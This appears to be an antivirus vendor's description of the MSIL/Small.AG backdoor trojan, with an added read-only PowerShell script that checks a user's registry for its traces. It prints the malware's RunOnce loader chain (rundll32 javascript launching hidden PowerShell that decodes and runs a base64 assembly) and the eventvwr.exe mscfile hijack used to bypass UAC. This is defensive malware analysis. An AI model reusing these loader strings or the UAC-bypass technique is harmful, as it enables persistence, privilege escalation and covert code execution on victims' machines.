MSIL/Small.AG [Threat Name]

MSIL/Small.AG [Threat Variant Name]

Category: trojan
Size: 79872 B
Detection created: Jan 21, 2014
Detection database version: 9318
Aliases: Exploit.Win32.BypassUAC.cnl (Kaspersky), Trojan:Win32/Skeeyah.A!bit (Microsoft)
Short description

The trojan serves as a backdoor. It can be controlled remotely.


When executed, the trojan creates the following files:

  • %mymusic%\pequad.bak

In order to be executed on system start, the trojan sets the following Registry entry:

  • [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
    • "EQuick2 Driver" = "rndll32.exe javascript:"\..\mshtml, RunHTMLApplication ";(eval("new ActiveXObject("WScript.Shell").Run("powershell.exe -Command iex((Get-ItemProperty -Path hkcu:LANMedia2).MPEG4Base)",0)"))(window.close())"
    • "MPEG4Base" = "[System.Reflection.Assembly]::Load([System.Convert]::FromBase64String([System.IO.File]::ReadAllText("%mymusic%\pequad.bak")))).EntryPoint.Invoke($null,$null)"

The following Registry entries are created:

  • [HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command]
    • "(Default)" = %originalmalwarepath%

Information stealing

The trojan collects the following information:

  • user name
  • computer name
  • operating system version

The trojan attempts to send gathered information to a remote machine.

Other information

The trojan acquires data and commands from a remote computer or the Internet.

The trojan contains a list of (2) URLs. The HTTP protocol is used.

It may perform the following actions:

  • download files from a remote computer and/or the Internet
  • run executable files
  • update itself to a newer version
  • uninstall itself

MSIL/Small.AG attempts to gain administrative privileges on the system.

The trojan is able to bypass User Account Control (UAC).

The trojan executes the following files:

  • C:\Windows\System32\eventvwr.exe
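
The registry artefacts described above (the RunOnce loader chain and the per-user mscfile handler used with eventvwr.exe) can be audited from the affected user's session. The script below is an added example written for this page, not ESET's code; it assumes Windows PowerShell 5.1 or later, that the loader value referenced as hkcu:LANMedia2 lives at HKCU\LANMedia2, and it only reports findings without changing anything.

```powershell
# Added audit script (not ESET's code): checks the current user's hive for
# the registry artefacts described on this page. It reports, it does not
# remove anything. Assumption: hkcu:LANMedia2 resolves to HKCU\LANMedia2.

function Test-SmallAGArtifacts {
    $findings = @()

    # 1. RunOnce values that chain rundll32 -> javascript: -> RunHTMLApplication
    $runOnce = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    if (Test-Path $runOnce) {
        $item = Get-ItemProperty -Path $runOnce
        foreach ($prop in $item.PSObject.Properties) {
            if ($prop.Name -like 'PS*') { continue }   # provider metadata, not a registry value
            if ("$($prop.Value)" -match 'javascript:.*RunHTMLApplication') {
                $findings += [pscustomobject]@{ Key = $runOnce; Name = $prop.Name; Data = $prop.Value }
            }
        }
    }

    # 2. The payload loader string: Load(FromBase64String(ReadAllText(...))).EntryPoint.Invoke
    #    The RunOnce command reads it from hkcu:LANMedia2, so check there and in RunOnce itself.
    foreach ($key in @('HKCU:\LANMedia2', $runOnce)) {
        if (-not (Test-Path $key)) { continue }
        $item = Get-ItemProperty -Path $key
        foreach ($prop in $item.PSObject.Properties) {
            if ("$($prop.Value)" -match 'FromBase64String.*EntryPoint\.Invoke') {
                $findings += [pscustomobject]@{ Key = $key; Name = $prop.Name; Data = $prop.Value }
            }
        }
    }

    # 3. mscfile handler under HKCU\Software\Classes. A stock system defines this
    #    class under HKLM only; a per-user copy is consulted first when eventvwr.exe
    #    opens its .msc console, which is how the command runs without a UAC prompt.
    $mscfile = 'HKCU:\Software\Classes\mscfile\shell\open\command'
    if (Test-Path $mscfile) {
        $default = (Get-ItemProperty -Path $mscfile).'(default)'
        $findings += [pscustomobject]@{ Key = $mscfile; Name = '(Default)'; Data = $default }
    }

    return $findings
}

$results = @(Test-SmallAGArtifacts)
if ($results.Count -eq 0) { 'No MSIL/Small.AG registry artefacts found for this user.' }
else { $results | Format-List }
```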

The trojan may create the following files:

  • %mymusic%\motanga.b2_
  • %mypictures%\%variable%

A string with variable content is used instead of %variable%.
